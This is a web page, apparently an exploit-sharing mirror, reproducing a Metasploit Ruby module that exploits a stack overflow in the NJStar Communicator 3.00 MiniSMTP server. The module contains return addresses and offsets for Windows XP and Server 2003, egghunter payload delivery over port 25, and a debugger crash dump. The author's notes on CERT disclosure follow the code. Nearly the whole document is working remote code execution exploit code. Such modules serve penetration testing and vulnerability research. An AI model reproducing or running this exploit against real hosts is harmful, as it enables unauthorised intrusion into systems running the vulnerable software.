扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 |
## # Exploit Title: NJStar Communicator 3.00 MiniSMTP Server Remote Exploit # Date: 10/31/2011 # Author: Dillon Beresford # Twitter: https://twitter.com/#!/D1N # Software Link: http://www.njstar.com/download/njcom.exe # Version: 3.00 and prior # Build: 11818 and prior # Tested on: Windows XP SP3/SP2/SP1 and Windows Server 2003 SP0 # CVE : NONE # Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran, # manils, d0tslash, mublix, halsten, and everyone at AHA! ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ # ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'NJStar Communicator 3.00 MiniSMTP Server Remote Exploit', 'Description' => %q{ This module exploits a stack overflow vulnerability in NJStar Communicator Version 3.00 MiniSMTP server. }, 'License' => MSF_LICENSE, 'Author' => [ 'Dillon Beresford', # Original discovery and MSF Module. 'Corelan Team', # tx for mona.py, all the tuts, and for being awesome. :) ], 'Version' => '$Revision:$', 'References' => [ [ 'OSVDB', '' ], [ 'CVE', '' ], [ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ], [ 'URL', 'http://www.youtube.com/watch?v=KvkKX035484'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00", 'StackAdjustment' => -1500, }, 'Targets' => [ [ 'Windows XP SP3', { 'Ret' => 0x7c874413, 'Offset' => 247, } # jmp esp kernel32.dll ], [ 'Windows XP SP2', { 'Ret' => 0x77558952, 'Offset'=> 247, } # jmp esp ntdll.dll ], [ 'Windows XP SP1', { 'Ret' => 0x77d718fc, 'Offset'=> 247, } # jmp esp user32.dll ], [ 'Windows Server 2003 SP0', { 'Ret' => 0x71c033a0, 'Offset' => 247, } # jmp esp ntdll.dll ], ], # Feel free to add more targets. 'Privileged' => false, 'DisclosureDate' => 'OCT 31 2011', 'DefaultTarget' => 0)) register_options([Opt::RPORT(25)], self.class) end def exploit eggoptions = { :checksum => true, :eggtag => "w00t" } badchars = '\x00' hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions) if target.name =~ /Windows XP SP3/ buffer =rand_text(target['Offset']) buffer << [target.ret].pack('V') buffer << hunter buffer << make_nops(4) elsif target.name =~ /Windows XP SP2/ buffer =rand_text(target['Offset']) buffer << [target.ret].pack('V') buffer << hunter buffer << make_nops(4) elsif target.name =~ /Windows XP SP1/ buffer = rand_text(target['Offset']) buffer << [target.ret].pack('V') buffer << hunter buffer << make_nops(4) elsif target.name =~ /Windows Server 2003 SP0/ buffer = rand_text(target['Offset']) buffer << [target.ret].pack('V') buffer << hunter buffer << make_nops(4) end # Just some debugging output so we can see lengths and byte size of each of our buffer. print_status("egg: %u bytes: \n" % egg.length + Rex::Text.to_hex_dump(egg)) print_status("hunter: %u bytes: \n" % hunter.length + Rex::Text.to_hex_dump(hunter)) print_status("buffer: %u bytes:\n" % buffer.length + Rex::Text.to_hex_dump(buffer)) print_status("Trying target #{target.name}...") # har har har you get trick no treat... # we dont have very much space so we # send our egg in a seperate connection connect print_status("Sending the egg...") sock.put(egg) # I think you betta call, ghostbusters... # now we send our evil buffer along with the # egg hunter, we are doing multiple connections # to solve the issue with limited stack space. # thanks to bannedit for advice on threads and # making multiple connections to get around # stack space constraints. :) connect print_status("Sending our buffer containing the egg hunter...") sock.put(buffer) handler disconnect end end ## # No response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded # on 10/30/11 and 10/31/11, CNCERT said in an email they needed to see if the vulnerability # is remotely exploitable and needed more verification. I sent a proof of concept exploit # in python with remote code execution. So, here is the proof that the bug is, in fact, # remotely exploitable. WIN! ## ## # eax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50 # edi=008a3d80 # eip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0 nv up ei pl nz na pe nc # cs=001bss=0023ds=0023es=0023fs=003bgs=0000 # efl=00010206 # 42424242 ????? # 0:003> !exchain # image00400000+bbc4 (0040bbc4) # 00ccff00: 41414141 # Invalid exception stack at 41414141 # 0:003> d esp # 00ccff7044 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44DDDDDDDDDDDDDDDD # 00ccff8044 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44DDDDDDDDDDDDDDDD # 00ccff9044 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44DDDDDDDDDDDDDDDD # 00ccffa044 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00DDDD......@. #A. # 00ccffb000 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00........)..|.=.. # 00ccffc000 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f.........=...... # 00ccffd000 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff................ # 00ccffe0d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00...|0..|........ ## |
体验盒子
